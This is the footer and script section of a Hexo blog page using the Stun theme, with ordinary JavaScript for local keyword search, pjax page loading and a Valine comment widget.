2022</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Jlan</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v6.0.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div><div class="busuanzi"><span class="busuanzi-siteuv"><span class="busuanzi-siteuv__icon"><i class="fas fa-user"></i></span><span class="busuanzi-siteuv__info">访问人数</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_uv"></span></span><span class="busuanzi-sitepv"><span class="busuanzi-siteuv__icon"><i class="fas fa-eye"></i></span><span class="busuanzi-siteuv__info">浏览总量</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_pv"></span></span></div><div>已经是Dest0g3的菜狗了</div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="搜索文章（支持多关键词，请用空格分隔）"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1.0.1/dist/canvas-nest.min.js" color="0,0,0" opacity="0.6" count="150" zIndex="-1"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.json';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ 文章无标题 ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', '请输入字符');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="https://cdn.jsdelivr.net/npm/pjax@latest/pjax.min.js"></script><script>window.addEventListener('DOMContentLoaded', function () {
  var pjax = new Pjax({"selectors":["head title","#main",".pjax-reload"],"history":true,"scrollTo":false,"scrollRestoration":false,"cacheBust":false,"debug":false,"currentUrlFullReload":false,"timeout":0});
  // 加载进度条的计时器
  var loadingTimer = null;

  // 重置页面 Y 方向上的滚动偏移量
  document.addEventListener('pjax:send', function () {
    $('.header-nav-menu').removeClass('show');
    if (CONFIG.pjax && CONFIG.pjax.avoidBanner) {
      $('html').velocity('scroll', {
        duration: 500,
        offset: $('#header').height(),
        easing: 'easeInOutCubic'
      });
    }

    var loadingBarWidth = 20;
    var MAX_LOADING_WIDTH = 95;

    $('.loading-bar').addClass('loading');
    $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    clearInterval(loadingTimer);
    loadingTimer = setInterval(function () {
      loadingBarWidth += 3;
      if (loadingBarWidth > MAX_LOADING_WIDTH) {
        loadingBarWidth = MAX_LOADING_WIDTH;
      }
      $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    }, 500);
  }, false);

  window.addEventListener('pjax:complete', function () {
    clearInterval(loadingTimer);
    $('.loading-bar__progress').css('width', '100%');
    $('.loading-bar').removeClass('loading');
    setTimeout(function () {
      $('.loading-bar__progress').css('width', '0');
    }, 400);
    $('link[rel=prefetch], script[data-pjax-rm]').each(function () {
      $(this).remove();
    });
    $('script[data-pjax], #pjax-reload script').each(function () {
      $(this).parent().append($(this).remove());
    });

    if (Stun.utils.pjaxReloadBoot) {
      Stun.utils.pjaxReloadBoot();
    }
    if (Stun.utils.pjaxReloadScroll) {
      Stun.utils.pjaxReloadScroll();
    }
    if (Stun.utils.pjaxReloadSidebar) {
      Stun.utils.pjaxReloadSidebar();
    }
    if (false) {
      if (Stun.utils.pjaxReloadHeader) {
        Stun.utils.pjaxReloadHeader();
      }
      if (Stun.utils.pjaxReloadScrollIcon) {
        Stun.utils.pjaxReloadScrollIcon();
      }
      if (Stun.utils.pjaxReloadLocalSearch) {
        Stun.utils.pjaxReloadLocalSearch();
      }
    }
  }, false);
}, false);</script><div id="pjax-reload"><script src="https://cdn.jsdelivr.net/gh/sukkaw/busuanzi@latest/bsz.pure.mini.js" async></script></div><script src="https://cdn.jsdelivr.net/npm/leancloud-storage@latest/dist/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script><script data-pjax="">function loadValine () {
  var GUEST_INFO = ['nick', 'mail', 'link'];
  var guest_info = 'nick,mail,link';

  guest_info = guest_info.split(',').filter(function(item) {
    return GUEST_INFO.indexOf(item) > -1;
  });
  new Valine({
    el: '#valine-container',
    appId: 'PRycUaQbxE5mebmnKTjtaRJg-gzGzoHsz',
    appKey: 'jGyP9zr05MTuqHpWaIkgYW4h',
    notify: true,
    verify: true,
    placeholder: '写点什么吧',
    avatar: 'mp',
    meta: guest_info,
    pageSize: '10' || 10,
    visitor: true,
    recordIP: true,
    lang: 'zh-cn,en' || 'zh-cn',
    path: window.location.pathname
  });
}

if (true) {
  loadValine();
} else {
  window.addEventListener('DOMContentLoaded', loadValine, false);
}</script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script><script type="application/json" src="/search.json"></script></body></html>